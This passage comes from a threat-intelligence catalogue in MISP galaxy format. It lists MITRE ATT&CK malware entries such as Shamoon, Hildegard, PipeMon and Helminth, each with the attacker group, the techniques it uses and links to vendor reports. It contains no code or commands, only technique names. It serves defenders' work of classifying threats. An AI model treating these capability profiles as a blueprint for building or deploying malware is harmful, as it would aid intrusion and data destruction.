uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1102.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="MSBuild - T1127.001" with estimative-language:likelihood-probability="almost-certain"

Table 4674. Table References
Links
https://attack.mitre.org/software/S0013
http://labs.lastline.com/an-analysis-of-plugx
https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html
http://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/
https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage
http://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf

Fysbis - S0410

[Fysbis](https://attack.mitre.org/software/S0410) is a Linux-based backdoor used by [APT28](https://attack.mitre.org/groups/G0007) that dates back to at least 2014.(Citation: Fysbis Palo Alto Analysis)

The tag is: misp-galaxy:mitre-malware="Fysbis - S0410"

Fysbis - S0410 is also known as:

Fysbis

View relationships graph

Fysbis - S0410 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Systemd Service - T1543.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="XDG Autostart Entries - T1547.013" with estimative-language:likelihood-probability="almost-certain"

Table 4675. Table References
Links
https://attack.mitre.org/software/S0410
https://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/

Shamoon - S0140

[Shamoon](https://attack.mitre.org/software/S0140) is wiper malware that was first used by an Iranian group known as the "Cutting Sword of Justice" in 2012. Other versions known as Shamoon 2 and Shamoon 3 were observed in 2016 and 2018. [Shamoon](https://attack.mitre.org/software/S0140) has also been seen leveraging [RawDisk](https://attack.mitre.org/software/S0364) and Filerase to carry out data wiping tasks. The term Shamoon is sometimes used to refer to the group using the malware as well as the malware itself.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)

The tag is: misp-galaxy:mitre-malware="Shamoon - S0140"

Shamoon - S0140 is also known as:

Shamoon
Disttrack

View relationships graph

Shamoon - S0140 has relationships with:

similar: misp-galaxy:tool="Shamoon" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Accounts - T1078.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disk Structure Wipe - T1561.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Token Impersonation/Theft - T1134.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Shutdown/Reboot - T1529" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"

Table 4676. Table References
Links
https://attack.mitre.org/software/S0140
http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/
https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/
https://www.symantec.com/connect/blogs/shamoon-attacks
https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html

Wiper - S0041

[Wiper](https://attack.mitre.org/software/S0041) is a family of destructive malware used in March 2013 during breaches of South Korean banks and media companies. (Citation: Dell Wiper)

The tag is: misp-galaxy:mitre-malware="Wiper - S0041"

Wiper - S0041 is also known as:

Wiper

View relationships graph

Wiper - S0041 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Software Deployment Tools - T1072" with estimative-language:likelihood-probability="almost-certain"

Table 4677. Table References
Links
https://attack.mitre.org/software/S0041
http://www.secureworks.com/cyber-threat-intelligence/threats/wiper-malware-analysis-attacking-korean-financial-sector/

MiniDuke - S0051

[MiniDuke](https://attack.mitre.org/software/S0051) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2010 to 2015. The [MiniDuke](https://attack.mitre.org/software/S0051) toolset consists of multiple downloader and backdoor components. The loader has been used with other [MiniDuke](https://attack.mitre.org/software/S0051) components as well as in conjunction with [CosmicDuke](https://attack.mitre.org/software/S0050) and [PinchDuke](https://attack.mitre.org/software/S0048). (Citation: F-Secure The Dukes)

The tag is: misp-galaxy:mitre-malware="MiniDuke - S0051"

MiniDuke - S0051 is also known as:

MiniDuke

View relationships graph

MiniDuke - S0051 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1102.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1568.002" with estimative-language:likelihood-probability="almost-certain"

Table 4678. Table References
Links
https://attack.mitre.org/software/S0051
https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf

POSHSPY - S0150

[POSHSPY](https://attack.mitre.org/software/S0150) is a backdoor that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2015. It appears to be used as a secondary backdoor used if the actors lost access to their primary backdoors. (Citation: FireEye POSHSPY April 2017)

The tag is: misp-galaxy:mitre-malware="POSHSPY - S0150"

POSHSPY - S0150 is also known as:

POSHSPY

View relationships graph

POSHSPY - S0150 has relationships with:

similar: misp-galaxy:malpedia="POSHSPY" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Data Transfer Size Limits - T1030" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1568.002" with estimative-language:likelihood-probability="almost-certain"

Table 4679. Table References
Links
https://attack.mitre.org/software/S0150
https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html

Ixeshe - S0015

[Ixeshe](https://attack.mitre.org/software/S0015) is a malware family that has been used since at least 2009 against targets in East Asia. (Citation: Moran 2013)

The tag is: misp-galaxy:mitre-malware="Ixeshe - S0015"

Ixeshe - S0015 is also known as:

Ixeshe

View relationships graph

Ixeshe - S0015 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"

Table 4680. Table References
Links
https://attack.mitre.org/software/S0015
https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html

PipeMon - S0501

[PipeMon](https://attack.mitre.org/software/S0501) is a multi-stage modular backdoor used by [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: ESET PipeMon May 2020)

The tag is: misp-galaxy:mitre-malware="PipeMon - S0501"

PipeMon - S0501 is also known as:

PipeMon

View relationships graph

PipeMon - S0501 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shared Modules - T1129" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Parent PID Spoofing - T1134.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Create Process with Token - T1134.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Print Processors - T1547.012" with estimative-language:likelihood-probability="almost-certain"

Table 4681. Table References
Links
https://attack.mitre.org/software/S0501
https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/

HDoor - S0061

[HDoor](https://attack.mitre.org/software/S0061) is malware that has been customized and used by the [Naikon](https://attack.mitre.org/groups/G0019) group. (Citation: Baumgartner Naikon 2015)

The tag is: misp-galaxy:mitre-malware="HDoor - S0061"

HDoor - S0061 is also known as:

HDoor
Custom HDoor

View relationships graph

HDoor - S0061 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"

Table 4682. Table References
Links
https://attack.mitre.org/software/S0061
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf

Hildegard - S0601

[Hildegard](https://attack.mitre.org/software/S0601) is malware that targets misconfigured kubelets for initial access and runs cryptocurrency miner operations. The malware was first observed in January 2021. The TeamTNT activity group is believed to be behind [Hildegard](https://attack.mitre.org/software/S0601). (Citation: Unit 42 Hildegard Malware)

The tag is: misp-galaxy:mitre-malware="Hildegard - S0601"

Hildegard - S0601 is also known as:

Hildegard

View relationships graph

Hildegard - S0601 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Resource Hijacking - T1496" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic Linker Hijacking - T1574.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Container Administration Command - T1609" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Cloud Instance Metadata API - T1552.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Container and Resource Discovery - T1613" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Escape to Host - T1611" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Systemd Service - T1543.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clear Command History - T1070.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 4683. Table References
Links
https://attack.mitre.org/software/S0601
https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/

SideTwist - S0610

[SideTwist](https://attack.mitre.org/software/S0610) is a C-based backdoor that has been used by [OilRig](https://attack.mitre.org/groups/G0049) since at least 2021.(Citation: Check Point APT34 April 2021)

The tag is: misp-galaxy:mitre-malware="SideTwist - S0610"

SideTwist - S0610 is also known as:

SideTwist

View relationships graph

SideTwist - S0610 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Obfuscation - T1001" with estimative-language:likelihood-probability="almost-certain"

Table 4684. Table References
Links
https://attack.mitre.org/software/S0610
https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/

BISCUIT - S0017

[BISCUIT](https://attack.mitre.org/software/S0017) is a backdoor that has been used by [APT1](https://attack.mitre.org/groups/G0006) since as early as 2007. (Citation: Mandiant APT1)

The tag is: misp-galaxy:mitre-malware="BISCUIT - S0017"

BISCUIT - S0017 is also known as:

BISCUIT

View relationships graph

BISCUIT - S0017 has relationships with:

similar: misp-galaxy:tool="BISCUIT" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"

Table 4685. Table References
Links
https://attack.mitre.org/software/S0017
https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report-appendix.zip

Helminth - S0170

[Helminth](https://attack.mitre.org/software/S0170) is a backdoor that has at least two variants - one written in VBScript and PowerShell that is delivered via a macros in Excel spreadsheets, and one that is a standalone Windows executable. (Citation: Palo Alto OilRig May 2016)

The tag is: misp-galaxy:mitre-malware="Helminth - S0170"

Helminth - S0170 is also known as:

Helminth

View relationships graph

Helminth - S0170 has relationships with:

similar: misp-galaxy:malpedia="Helminth" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Transfer Size Limits - T1030" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"

Table 4686. Table References
Links
https://attack.mitre.org/software/S0170
http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/

hcdLoader - S0071

[hcdLoader](https://attack.mitre.org/software/S0071) is a remote access tool (RAT) that has been used by [APT18](https://attack.mitre.org/groups/G0026). (Citation: Dell Lateral Movement)

The tag is: misp-galaxy:mitre-malware="hcdLoader - S0071"

hcdLoader - S0071 is also known as:

hcdLoader

View relationships graph

hcdLoader - S0071 has relationships with:

similar: misp-galaxy:rat="hcdLoader" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 4687. Table References
Links
https://attack.mitre.org/software/S0071
http://www.secureworks.com/resources/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems/

Elise - S0081

